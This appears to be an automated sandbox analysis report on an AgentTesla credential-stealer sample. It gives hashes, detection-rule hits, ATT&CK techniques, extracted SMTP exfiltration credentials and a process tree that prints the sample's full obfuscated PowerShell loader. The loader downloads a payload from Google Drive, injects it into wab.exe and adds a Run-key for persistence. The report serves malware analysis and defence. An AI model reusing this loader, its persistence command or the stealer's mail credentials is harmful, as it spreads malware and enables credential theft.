agenttesla | 4667d2988c844cd2bfc3e983f1106c37cd196376a43d4fddcc278fab87ea8e0c

Analysis

max time kernel
145s
max time network
124s
platform
windows7_x64
resource
win7-20240220-en
resource tags

arch:x64arch:x86image:win7-20240220-enlocale:en-usos:windows7-x64system
submitted
24/04/2024, 01:21

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

4667d2988c844cd2bfc3e983f1106c37cd196376a43d4fddcc278fab87ea8e0c.vbs
Size

278KB
MD5

1afdbe303941cc8155f48c9b61bd3df4
SHA1

d141b2f53f5679299bcd802791697bc831dd0a98
SHA256

4667d2988c844cd2bfc3e983f1106c37cd196376a43d4fddcc278fab87ea8e0c
SHA512

ac39f37a13dcb7dd6d41fc6a18f8b4cd190cfe9f5131e75c5ae29ea0b355ab1339138dde807df59080e68dd769590b7d43598f9532045568c6afa07dd70ed891
SSDEEP

6144:LrdAYDLBLW+8A1ytW3xrbjsSFuHeEC57kdmXl45zaoGGqAP3MQ9scO4c8J1BFew9:/nS2ImPy2wrB

Score

10^/10

agenttesla keylogger persistence spyware stealer trojan

Malware Config

Extracted

Family

agenttesla

Credentials

Protocol: smtp
Host:
mail.myhydropowered.com
Port:
587
Username:
[email protected]
Password:
nrtwHxQjV4IQZUH
Email To:
[email protected]

Signatures

AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
keylogger trojan stealer spyware agenttesla

Detect packed .NET executables. Mostly AgentTeslaV4. 2 IoCs

resource	yara_rule
behavioral1/memory/2808-80-0x00000000002A0000-0x0000000001302000-memory.dmp	INDICATOR_EXE_Packed_GEN01
behavioral1/memory/2808-81-0x00000000002A0000-0x00000000002E2000-memory.dmp	INDICATOR_EXE_Packed_GEN01

Detects binaries (Windows and macOS) referencing many web browsers. Observed in information stealers. 2 IoCs

resource	yara_rule
behavioral1/memory/2808-80-0x00000000002A0000-0x0000000001302000-memory.dmp	INDICATOR_SUSPICIOUS_Binary_References_Browsers
behavioral1/memory/2808-81-0x00000000002A0000-0x00000000002E2000-memory.dmp	INDICATOR_SUSPICIOUS_Binary_References_Browsers

Detects binaries and memory artifacts referencing sandbox DLLs typically observed in sandbox evasion 2 IoCs

resource	yara_rule
behavioral1/memory/2808-80-0x00000000002A0000-0x0000000001302000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_SandboxHookingDLL
behavioral1/memory/2808-81-0x00000000002A0000-0x00000000002E2000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_SandboxHookingDLL

Detects executables referencing Windows vault credential objects. Observed in infostealers 2 IoCs

resource	yara_rule
behavioral1/memory/2808-80-0x00000000002A0000-0x0000000001302000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID
behavioral1/memory/2808-81-0x00000000002A0000-0x00000000002E2000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID

Detects executables referencing many confidential data stores found in browsers, mail clients, cryptocurreny wallets, etc. Observed in information stealers 2 IoCs

resource	yara_rule
behavioral1/memory/2808-80-0x00000000002A0000-0x0000000001302000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_References_Confidential_Data_Store
behavioral1/memory/2808-81-0x00000000002A0000-0x00000000002E2000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_References_Confidential_Data_Store

Detects executables referencing many email and collaboration clients. Observed in information stealers 2 IoCs

resource	yara_rule
behavioral1/memory/2808-80-0x00000000002A0000-0x0000000001302000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_References_Messaging_Clients
behavioral1/memory/2808-81-0x00000000002A0000-0x00000000002E2000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_References_Messaging_Clients

Detects executables referencing many file transfer clients. Observed in information stealers 2 IoCs

resource	yara_rule
behavioral1/memory/2808-80-0x00000000002A0000-0x0000000001302000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_Referenfces_File_Transfer_Clients
behavioral1/memory/2808-81-0x00000000002A0000-0x00000000002E2000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_Referenfces_File_Transfer_Clients

Blocklisted process makes network request 3 IoCs

flow	pid	Process
3	2276	WScript.exe
7	2112	powershell.exe
9	2112	powershell.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Windows\CurrentVersion\Run\Andelsbevaegelsen = "%Before110% -w 1 $Tohndig=(Get-ItemProperty -Path 'HKCU:\\Dirigent\\').skemaformernes;%Before110% ($Tohndig)"	reg.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service

T1102

flow	ioc
6	drive.google.com
7	drive.google.com
11	drive.google.com

Looks up external IP address via web service 3 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
16	api.ipify.org
17	api.ipify.org
18	ip-api.com

Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs

pid	Process
2808	wab.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

pid	Process
3000	powershell.exe
2808	wab.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 3000 set thread context of 2808	3000	powershell.exe	35

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Modifies registry key 1 TTPs 1 IoCs

Modify Registry

T1112

pid	Process
1784	reg.exe

Suspicious behavior: EnumeratesProcesses 5 IoCs

pid	Process
2112	powershell.exe
3000	powershell.exe
3000	powershell.exe
2808	wab.exe
2808	wab.exe

Suspicious behavior: MapViewOfSection 1 IoCs

pid	Process
3000	powershell.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeDebugPrivilege	2112	powershell.exe
Token: SeDebugPrivilege	3000	powershell.exe
Token: SeDebugPrivilege	2808	wab.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
2808	wab.exe

Suspicious use of WriteProcessMemory 28 IoCs

description	pid	Process	procid_target
PID 2276 wrote to memory of 2112	2276	WScript.exe	29
PID 2276 wrote to memory of 2112	2276	WScript.exe	29
PID 2276 wrote to memory of 2112	2276	WScript.exe	29
PID 2112 wrote to memory of 2696	2112	powershell.exe	31
PID 2112 wrote to memory of 2696	2112	powershell.exe	31
PID 2112 wrote to memory of 2696	2112	powershell.exe	31
PID 2112 wrote to memory of 3000	2112	powershell.exe	33
PID 2112 wrote to memory of 3000	2112	powershell.exe	33
PID 2112 wrote to memory of 3000	2112	powershell.exe	33
PID 2112 wrote to memory of 3000	2112	powershell.exe	33
PID 3000 wrote to memory of 1344	3000	powershell.exe	34
PID 3000 wrote to memory of 1344	3000	powershell.exe	34
PID 3000 wrote to memory of 1344	3000	powershell.exe	34
PID 3000 wrote to memory of 1344	3000	powershell.exe	34
PID 3000 wrote to memory of 2808	3000	powershell.exe	35
PID 3000 wrote to memory of 2808	3000	powershell.exe	35
PID 3000 wrote to memory of 2808	3000	powershell.exe	35
PID 3000 wrote to memory of 2808	3000	powershell.exe	35
PID 3000 wrote to memory of 2808	3000	powershell.exe	35
PID 3000 wrote to memory of 2808	3000	powershell.exe	35
PID 2808 wrote to memory of 640	2808	wab.exe	38
PID 2808 wrote to memory of 640	2808	wab.exe	38
PID 2808 wrote to memory of 640	2808	wab.exe	38
PID 2808 wrote to memory of 640	2808	wab.exe	38
PID 640 wrote to memory of 1784	640	cmd.exe	40
PID 640 wrote to memory of 1784	640	cmd.exe	40
PID 640 wrote to memory of 1784	640	cmd.exe	40
PID 640 wrote to memory of 1784	640	cmd.exe	40

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\4667d2988c844cd2bfc3e983f1106c37cd196376a43d4fddcc278fab87ea8e0c.vbs"
1⤵
- Blocklisted process makes network request
- Suspicious use of WriteProcessMemory
PID:2276
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Riffelgange = 1;$Authorish='Substrin';$Authorish+='g';Function Shockhead($Kaputt){$Spisefrikvarterernes=$Kaputt.Length-$Riffelgange;For($Ratihabumr=5; $Ratihabumr -lt $Spisefrikvarterernes; $Ratihabumr+=(6)){$Udsagnsleddenes+=$Kaputt.$Authorish.Invoke($Ratihabumr, $Riffelgange);}$Udsagnsleddenes;}function sabotage($Velal){& ($Tanquelinian) ($Velal);}$Greenheart=Shockhead 'OutraMIndowoAigrezBestoiSkspolMusikl ,utsa Brne/Gr.nd5.itin.Afdel0Up,ai Zw ng(SynapWNjereiCoresnD,agsdTosdeoHerrgwkroe sbil,e .runeNStrafTPraec Forma1Myoli0The,m. Bort0Opfi,;Enkel Arch,WIrradiObsern Kyst6.odra4Banju; eval For axUdban6Czare4Spat ;under TayerrUnd,iv tred:M.ckb1Jacqu2Maime1 Seri.Deesk0Allop) Brad BeregGHemodeSalewc DiskkRandmoVolit/ Qu z2 Kruk0Fo.nu1Ordfo0 enio0,anlo1jetst0Invas1Gaska Knif.FS criiRgerirGillyeStridf Toitovexdex.nnek/Gener1Orke.2minst1Bo.it. ,eha0Dia,o ';$Feline=Shockhead 'StripUOverts PoliegalehrOsobe-ForaaASkinkgOmgiveEnwinnSanc tJinri ';$ostler=Shockhead 'goo,whKvikkt Nikot ousp udstsNemme:Ha dw/Tjles/GorvadAntiprChivei Sie.vKontreDansk.FellygPrivaoP eezoViolig B,dflAmpeleO var.IsospcSubtroMowbumJacke/Tilbau VictcOpsge?RibboeTurp.xI,prgpTelevoHofchrhavait pakk= NurtdbearloTrevewPutnanFu,ill.resuoextena SpirdSe vi& SundiHistodManja= Allo1FrugthEncheJ estyNymphvNucl gappasAA ninV U.pebPoachPUgtetJJol,e7 .eww5Lob.tW TyphNEndomnAnalyYharmem AliqHadvenv Al ypTurnuQGenerDKropskNy.tiE.nobs9 WindK BeunTMon sfapoloZDisozPSnesksAfvaekInte ';$Olympier=Shockhead 'Det r>R dio ';$Tanquelinian=Shockhead 'Succei,nackeFascixCiv l ';$Aminobenzamide = Shockhead 'PreloeForcec FilihGuelpoNone. B cki%B,ahmainterpInserpBrunldUd rmaAnd.lt KarbaAquar% Bri.\ kattPBlodrrIndhoe MonahNav,ea,egiststr,irmocame B lldAfsky.Unc.vFDomsfiJav.ldRevi Oc.i&Stnne&Chrys Skrine OvercHendehMelleoDm,ni Tritu$ sept ';sabotage (Shockhead 'Bigba$Storhg R,tilTrim oUnadvb DissaSamm.lCr,nk: CecoAForemaKi,kenUnfledSportePsychlToledyBramsdTan eeNrga nSmaafs Exce=rotte(T.skncB dummvalerdDelib Demat/InaudcBiogr Fa el$WretcAnormam ForsiEnneanmidnio ColebUnexteKlonen undsz SkumaBevilmTvrf i DestdFlexueB,lim)Adnot ');sabotage (Shockhead 'Form.$WienegPal.nlAlleyoballobEnedia BlgelStyre:ExpouUSchoon,mbets EngahLydliu Hel.nK.tukn.kraleUn.erdAlcoh=Overf$,iurooNaticsK,loltDimpll S,mieDann rforgl.Oplgns ominp DubblafgrsiGangat alsr(U orb$musheOGl.cilOrdney nordmTeorip iploi,ympae HeltrBeta )Fresn ');$ostler=$Unshunned[0];sabotage (Shockhead 'Super$Ups agHeterlPal.to Smelb Br.aaParanl mikr:SloucMHasareWhalesFrdigsPentaa Gen.nEvitisVirag=RadioNAitche G,unwPeete-Prea,Odykkeb Ma sj.verbeH kkecAnl,st Phy. UdbarS,eceny,emuns FiprtMelame Klipmalkef..vnbyN UrokeSaltatEndur.samarWStavneAp,erbDikotCUnderl TrokiInj reStudenStrimtDowse ');sabotage (Shockhead 'Rigni$A ticMEjende Be nslichestraneaTono,nGgesnsGerma.,etalHW.noneThereabeford emme strorPhi.os klo,[Joint$biskuFforbieShor.l YletimockinBoge,eBe.ne] Band=Kam a$ UncoGStul,rTendieIdeykeSyrefnInd ahTeknoeLukkeaReregrHa.dwtTil e ');$Cleanliness=Shockhead 'E strMNoiseePlantsDi.kmsFre.saStolpnOverpsH lvb.Skad DArb,joWaii,wGlucinFirdol,arsnoavoweaForlfdSacriF LipoiTherelKashreOverc(Reinq$Bred.oNoncosDiffetAtomml orue erfrSubj,,Brand$,ontrAUdadldEnspnvColumeF.rier IntetSto.eiSnow,s OveresortemhulheeFluatn ForbtDegl,) Letf ';$Cleanliness=$Aandelydens[1]+$Cleanliness;$Advertisement=$Aandelydens[0];sabotage (Shockhead 'ba ka$KonsogMallol,eeamoLng rbSt.dfa Extrl Oper:Mou tS Enc,tUninwoDyskimLbrikaNoveltS ppeoBemedlVejfoaDyrknlSikkeiAnv,la Cami=C arm( st pTValu.eLdst.sMandot re,l-Al.egP Cafaa KnaptMismohUneva assai$ St.lA BobsdTonsuvSu.ere.ruitrflerbtGrammi ReexsBantaeKreatmHonoreSubconYn,eftNosta)Solis ');while (!$Stomatolalia) {sabotage (Shockhead 'M,ner$aj.urgTilstlTr eroNedkabchemiaunm,rlRecto:Maar,BPol.teUnscokImpotlHeltiiWestfpFranc=Infor$UdskytForvar GypsuBjer.eK ini ') ;sabotage $Cleanliness;sabotage (Shockhead 'EnegnSO,erbtTilh,a UngerHjemmtAutoc-SikkeSGrundlBeboeeBiog.eTerrapBrati Kolpo4Hawai ');sabotage (Shockhead 'Forva$Afvasg sturl UnseoMuni.bArlasaBalallj.mre:CalviS Be ttHy.peoAnti.mVidera CalltLandgo,antal Toasa Li.glWatchiCunctaEx,re=Aflgg( SamvT Ov reHvilesPartntSleet-SildePJohnsaLsthnt Sarchsteti Farv$PhysiAAbekad aardv AfteeH.venr EkmatCatariRosels,ttene E.ytmBoligeBoomenBiltytOlied),veri ') ;sabotage (Shockhead 'Fo,pe$TekstgpratflExotioKandebAceraaIsledlQuais:Emo.lCIrrefoPrecafFor.kfRrblaeordinyAnth =ingur$Dyre,g ,inulLi,teoDispeb K,lma PostlTitle:HofdaOPodopv Lim.eHum ir BayehNybago.akkenWebsaoFradruKosmor EtmasUdvan+ n,pp+Capit%jutta$MakulU Ov rnPullisSam.ehHv eluS.nksnPlattnTrakte MudkdFeist. Iv ncAbortoOpkaluCoop.nOrdgytBanko ') ;$ostler=$Unshunned[$Coffey];}sabotage (Shockhead 'Foelg$ H,stgO.twilBumblo AktibSardiaB vrtlstrig:elusiHSkattiBuncen Undek ,aadeBe tysGravm1Beho 7Foeta1Ha wa Disp=Unill Saa,bG ,alle Sjl.tDelim-KloniCAeroto SpronAmorttMatloeProrinRegertNvnel Annbe$CainoADigitdPr hiv Il.ee,eboer Scabtremaii.usyisTilvreVariamMiddae,eeksnParont Seme ');sabotage (Shockhead 'consp$ Ser,gHe,orlWron,oReplibFleksaLev.fl Tent: L.goOCheekpTr.tehc.leuiBetr d Unifsopsk e IndilTrills UklaeGenopnPrlu sDisas Fdsel=Nable Fjeli[Cere SF,rpuy.attesAnnuat Bu geMirakm Fora.VidebCOctaeoSemihnEx,riv NosteVeterrLagentLo,ts] Lgel: Irid:RepavF KalvrLophoo Mon.mIbskaB I poaKlagesU suleTekn 6 ar e4skattSCo,metSldehrPlanfi TriknWingegal yl(Tnkba$ Ge,sHUnpoliFortrnTilfrkTitoieM.sors uss1Pente7B.and1Liter)Fors ');sabotage (Shockhead 'A,ure$QuadrgHe milCrysto UndebGrid,a RkenlSvar,:,ndelS tereaSk,tkuTaster SteriFawe ePsyk.sBalla T,igg=Enspr Q,atr[Nj.gtSBrne yTotemsWiljatRombleVek emFa.rd.JaspiT Fu,deSuffex,verdt M.te.HydroE CsiunBarnecanvenoIn uidTr nsiReg.on QuargKonse]Frike:Infel:.warfApatroSLe.trCAlimeIMaeglIFe ch.NeuraGReposecoun,t FligSAlchetPleber Pag.izairen Spi,g R,nt(Festr$RemoiO Karbp TakthLe.ali ocktdt,kkes Prusedksmal ndes L,mieUndecnekspos Skib)Ekspe ');sabotage (Shockhead 'Innov$An lag AblulYaqonoEquilbAm.slaPhotolArthr: TrygNHjemmoBlaatn Sce cPleaclSprezaErklrrSyreriHestefStandiUnhoscSergeaInan t S.ediKonjuoHaandn Spl =unpro$CrackSRdklka,rithuC,nalrAbsoliGtesee SchesKawc,.Pumpesharddu B sibP ncrsSi,tetChilarKamali.lygtnDirekg Sve.( retn2irreg9Coldc0.enua6sankt9M,jem7Forma, bes.2 Coll9Kopul4Detri5 Ner 0Trium)Opsl, ');sabotage $Nonclarification;"
  2⤵
  - Blocklisted process makes network request
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2112
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Prehatred.Fid && echo $"
    3⤵
    PID:2696
- - C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Riffelgange = 1;$Authorish='Substrin';$Authorish+='g';Function Shockhead($Kaputt){$Spisefrikvarterernes=$Kaputt.Length-$Riffelgange;For($Ratihabumr=5; $Ratihabumr -lt $Spisefrikvarterernes; $Ratihabumr+=(6)){$Udsagnsleddenes+=$Kaputt.$Authorish.Invoke($Ratihabumr, $Riffelgange);}$Udsagnsleddenes;}function sabotage($Velal){& ($Tanquelinian) ($Velal);}$Greenheart=Shockhead 'OutraMIndowoAigrezBestoiSkspolMusikl ,utsa Brne/Gr.nd5.itin.Afdel0Up,ai Zw ng(SynapWNjereiCoresnD,agsdTosdeoHerrgwkroe sbil,e .runeNStrafTPraec Forma1Myoli0The,m. Bort0Opfi,;Enkel Arch,WIrradiObsern Kyst6.odra4Banju; eval For axUdban6Czare4Spat ;under TayerrUnd,iv tred:M.ckb1Jacqu2Maime1 Seri.Deesk0Allop) Brad BeregGHemodeSalewc DiskkRandmoVolit/ Qu z2 Kruk0Fo.nu1Ordfo0 enio0,anlo1jetst0Invas1Gaska Knif.FS criiRgerirGillyeStridf Toitovexdex.nnek/Gener1Orke.2minst1Bo.it. ,eha0Dia,o ';$Feline=Shockhead 'StripUOverts PoliegalehrOsobe-ForaaASkinkgOmgiveEnwinnSanc tJinri ';$ostler=Shockhead 'goo,whKvikkt Nikot ousp udstsNemme:Ha dw/Tjles/GorvadAntiprChivei Sie.vKontreDansk.FellygPrivaoP eezoViolig B,dflAmpeleO var.IsospcSubtroMowbumJacke/Tilbau VictcOpsge?RibboeTurp.xI,prgpTelevoHofchrhavait pakk= NurtdbearloTrevewPutnanFu,ill.resuoextena SpirdSe vi& SundiHistodManja= Allo1FrugthEncheJ estyNymphvNucl gappasAA ninV U.pebPoachPUgtetJJol,e7 .eww5Lob.tW TyphNEndomnAnalyYharmem AliqHadvenv Al ypTurnuQGenerDKropskNy.tiE.nobs9 WindK BeunTMon sfapoloZDisozPSnesksAfvaekInte ';$Olympier=Shockhead 'Det r>R dio ';$Tanquelinian=Shockhead 'Succei,nackeFascixCiv l ';$Aminobenzamide = Shockhead 'PreloeForcec FilihGuelpoNone. B cki%B,ahmainterpInserpBrunldUd rmaAnd.lt KarbaAquar% Bri.\ kattPBlodrrIndhoe MonahNav,ea,egiststr,irmocame B lldAfsky.Unc.vFDomsfiJav.ldRevi Oc.i&Stnne&Chrys Skrine OvercHendehMelleoDm,ni Tritu$ sept ';sabotage (Shockhead 'Bigba$Storhg R,tilTrim oUnadvb DissaSamm.lCr,nk: CecoAForemaKi,kenUnfledSportePsychlToledyBramsdTan eeNrga nSmaafs Exce=rotte(T.skncB dummvalerdDelib Demat/InaudcBiogr Fa el$WretcAnormam ForsiEnneanmidnio ColebUnexteKlonen undsz SkumaBevilmTvrf i DestdFlexueB,lim)Adnot ');sabotage (Shockhead 'Form.$WienegPal.nlAlleyoballobEnedia BlgelStyre:ExpouUSchoon,mbets EngahLydliu Hel.nK.tukn.kraleUn.erdAlcoh=Overf$,iurooNaticsK,loltDimpll S,mieDann rforgl.Oplgns ominp DubblafgrsiGangat alsr(U orb$musheOGl.cilOrdney nordmTeorip iploi,ympae HeltrBeta )Fresn ');$ostler=$Unshunned[0];sabotage (Shockhead 'Super$Ups agHeterlPal.to Smelb Br.aaParanl mikr:SloucMHasareWhalesFrdigsPentaa Gen.nEvitisVirag=RadioNAitche G,unwPeete-Prea,Odykkeb Ma sj.verbeH kkecAnl,st Phy. UdbarS,eceny,emuns FiprtMelame Klipmalkef..vnbyN UrokeSaltatEndur.samarWStavneAp,erbDikotCUnderl TrokiInj reStudenStrimtDowse ');sabotage (Shockhead 'Rigni$A ticMEjende Be nslichestraneaTono,nGgesnsGerma.,etalHW.noneThereabeford emme strorPhi.os klo,[Joint$biskuFforbieShor.l YletimockinBoge,eBe.ne] Band=Kam a$ UncoGStul,rTendieIdeykeSyrefnInd ahTeknoeLukkeaReregrHa.dwtTil e ');$Cleanliness=Shockhead 'E strMNoiseePlantsDi.kmsFre.saStolpnOverpsH lvb.Skad DArb,joWaii,wGlucinFirdol,arsnoavoweaForlfdSacriF LipoiTherelKashreOverc(Reinq$Bred.oNoncosDiffetAtomml orue erfrSubj,,Brand$,ontrAUdadldEnspnvColumeF.rier IntetSto.eiSnow,s OveresortemhulheeFluatn ForbtDegl,) Letf ';$Cleanliness=$Aandelydens[1]+$Cleanliness;$Advertisement=$Aandelydens[0];sabotage (Shockhead 'ba ka$KonsogMallol,eeamoLng rbSt.dfa Extrl Oper:Mou tS Enc,tUninwoDyskimLbrikaNoveltS ppeoBemedlVejfoaDyrknlSikkeiAnv,la Cami=C arm( st pTValu.eLdst.sMandot re,l-Al.egP Cafaa KnaptMismohUneva assai$ St.lA BobsdTonsuvSu.ere.ruitrflerbtGrammi ReexsBantaeKreatmHonoreSubconYn,eftNosta)Solis ');while (!$Stomatolalia) {sabotage (Shockhead 'M,ner$aj.urgTilstlTr eroNedkabchemiaunm,rlRecto:Maar,BPol.teUnscokImpotlHeltiiWestfpFranc=Infor$UdskytForvar GypsuBjer.eK ini ') ;sabotage $Cleanliness;sabotage (Shockhead 'EnegnSO,erbtTilh,a UngerHjemmtAutoc-SikkeSGrundlBeboeeBiog.eTerrapBrati Kolpo4Hawai ');sabotage (Shockhead 'Forva$Afvasg sturl UnseoMuni.bArlasaBalallj.mre:CalviS Be ttHy.peoAnti.mVidera CalltLandgo,antal Toasa Li.glWatchiCunctaEx,re=Aflgg( SamvT Ov reHvilesPartntSleet-SildePJohnsaLsthnt Sarchsteti Farv$PhysiAAbekad aardv AfteeH.venr EkmatCatariRosels,ttene E.ytmBoligeBoomenBiltytOlied),veri ') ;sabotage (Shockhead 'Fo,pe$TekstgpratflExotioKandebAceraaIsledlQuais:Emo.lCIrrefoPrecafFor.kfRrblaeordinyAnth =ingur$Dyre,g ,inulLi,teoDispeb K,lma PostlTitle:HofdaOPodopv Lim.eHum ir BayehNybago.akkenWebsaoFradruKosmor EtmasUdvan+ n,pp+Capit%jutta$MakulU Ov rnPullisSam.ehHv eluS.nksnPlattnTrakte MudkdFeist. Iv ncAbortoOpkaluCoop.nOrdgytBanko ') ;$ostler=$Unshunned[$Coffey];}sabotage (Shockhead 'Foelg$ H,stgO.twilBumblo AktibSardiaB vrtlstrig:elusiHSkattiBuncen Undek ,aadeBe tysGravm1Beho 7Foeta1Ha wa Disp=Unill Saa,bG ,alle Sjl.tDelim-KloniCAeroto SpronAmorttMatloeProrinRegertNvnel Annbe$CainoADigitdPr hiv Il.ee,eboer Scabtremaii.usyisTilvreVariamMiddae,eeksnParont Seme ');sabotage (Shockhead 'consp$ Ser,gHe,orlWron,oReplibFleksaLev.fl Tent: L.goOCheekpTr.tehc.leuiBetr d Unifsopsk e IndilTrills UklaeGenopnPrlu sDisas Fdsel=Nable Fjeli[Cere SF,rpuy.attesAnnuat Bu geMirakm Fora.VidebCOctaeoSemihnEx,riv NosteVeterrLagentLo,ts] Lgel: Irid:RepavF KalvrLophoo Mon.mIbskaB I poaKlagesU suleTekn 6 ar e4skattSCo,metSldehrPlanfi TriknWingegal yl(Tnkba$ Ge,sHUnpoliFortrnTilfrkTitoieM.sors uss1Pente7B.and1Liter)Fors ');sabotage (Shockhead 'A,ure$QuadrgHe milCrysto UndebGrid,a RkenlSvar,:,ndelS tereaSk,tkuTaster SteriFawe ePsyk.sBalla T,igg=Enspr Q,atr[Nj.gtSBrne yTotemsWiljatRombleVek emFa.rd.JaspiT Fu,deSuffex,verdt M.te.HydroE CsiunBarnecanvenoIn uidTr nsiReg.on QuargKonse]Frike:Infel:.warfApatroSLe.trCAlimeIMaeglIFe ch.NeuraGReposecoun,t FligSAlchetPleber Pag.izairen Spi,g R,nt(Festr$RemoiO Karbp TakthLe.ali ocktdt,kkes Prusedksmal ndes L,mieUndecnekspos Skib)Ekspe ');sabotage (Shockhead 'Innov$An lag AblulYaqonoEquilbAm.slaPhotolArthr: TrygNHjemmoBlaatn Sce cPleaclSprezaErklrrSyreriHestefStandiUnhoscSergeaInan t S.ediKonjuoHaandn Spl =unpro$CrackSRdklka,rithuC,nalrAbsoliGtesee SchesKawc,.Pumpesharddu B sibP ncrsSi,tetChilarKamali.lygtnDirekg Sve.( retn2irreg9Coldc0.enua6sankt9M,jem7Forma, bes.2 Coll9Kopul4Detri5 Ner 0Trium)Opsl, ');sabotage $Nonclarification;"
    3⤵
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - Suspicious use of SetThreadContext
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: MapViewOfSection
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:3000
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Prehatred.Fid && echo $"
      4⤵
      PID:1344
  - - C:\Program Files (x86)\windows mail\wab.exe
      "C:\Program Files (x86)\windows mail\wab.exe"
      4⤵
      Suspicious use of NtCreateThreadExHideFromDebugger
      Suspicious use of NtSetInformationThreadHideFromDebugger
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of SetWindowsHookEx
      Suspicious use of WriteProcessMemory
      PID:2808
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Andelsbevaegelsen" /t REG_EXPAND_SZ /d "%Before110% -w 1 $Tohndig=(Get-ItemProperty -Path 'HKCU:\Dirigent\').skemaformernes;%Before110% ($Tohndig)"
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:640
      - C:\Windows\SysWOW64\reg.exe
        
        REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Andelsbevaegelsen" /t REG_EXPAND_SZ /d "%Before110% -w 1 $Tohndig=(Get-ItemProperty -Path 'HKCU:\Dirigent\').skemaformernes;%Before110% ($Tohndig)"
        6⤵
        Adds Run key to start application
        Modifies registry key
        
        PID:1784

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015

Filesize
68KB

MD5
29f65ba8e88c063813cc50a4ea544e93

SHA1
05a7040d5c127e68c25d81cc51271ffb8bef3568

SHA256
1ed81fa8dfb6999a9fedc6e779138ffd99568992e22d300acd181a6d2c8de184

SHA512
e29b2e92c496245bed3372578074407e8ef8882906ce10c35b3c8deebfefe01b5fd7f3030acaa693e175f4b7aca6cd7d8d10ae1c731b09c5fa19035e005de3aa

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
032cc8a2b9c4d62db76bbaa09088825a

SHA1
60b52d460fab0b110ea5f1ce68af7180be329573

SHA256
78f58c55d7c89ea88db6ceb690d28a9f79dbbc3d9e69283dcc7e809c7a8f8d96

SHA512
d75f13ef58f63db880823903bb82467bee47173047291618836569d818921c8ee5fcf0f7aa1acda8fd9a6ec119bd3952c231ee88ffbe1424f8c7be91ff4b1722

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\B39D2LI0KJPM8RN3WP4R.temp

Filesize
7KB

MD5
211fa0aadef9e8c02138a0427411fc4a

SHA1
a26c69bd31482f1bfca94c6cb96a910fa9f0ea6c

SHA256
a3835c983413d6f7816e337170f9585baff457a3265805e9a19e7765ea8e8cb4

SHA512
50266e48568553687f0727618481cc4358bac8f8de928392261ea24ad7e52b669f766248966173439c0b981ef86f694d6f05a1ecb3d75a4078e0833134354e54

Download Submit
C:\Users\Admin\AppData\Roaming\Prehatred.Fid

Filesize
416KB

MD5
19b0efa692322da3f33d9ba4ee8bde8a

SHA1
fb78ba19aba010c732dde93fe6c2392b9c3fdcfa

SHA256
b8a96d3dc14996c2df76ba2f139f9b885fc95bf69e9e2b3b989b0733e15c8510

SHA512
a6c84ce8c1f5bcf461561e5c5eae60ebaea49ceca0a3e009d9e968e7d9cf927a29edf4f6d0260b7e4325ad2395c03499db26890b6e8daf2b8321e0e3db247d99

Download Submit
memory/2112-25-0x000007FEF51A0000-0x000007FEF5B3D000-memory.dmp

Filesize
9.6MB

Download
memory/2112-26-0x0000000002D00000-0x0000000002D80000-memory.dmp

Filesize
512KB

Download
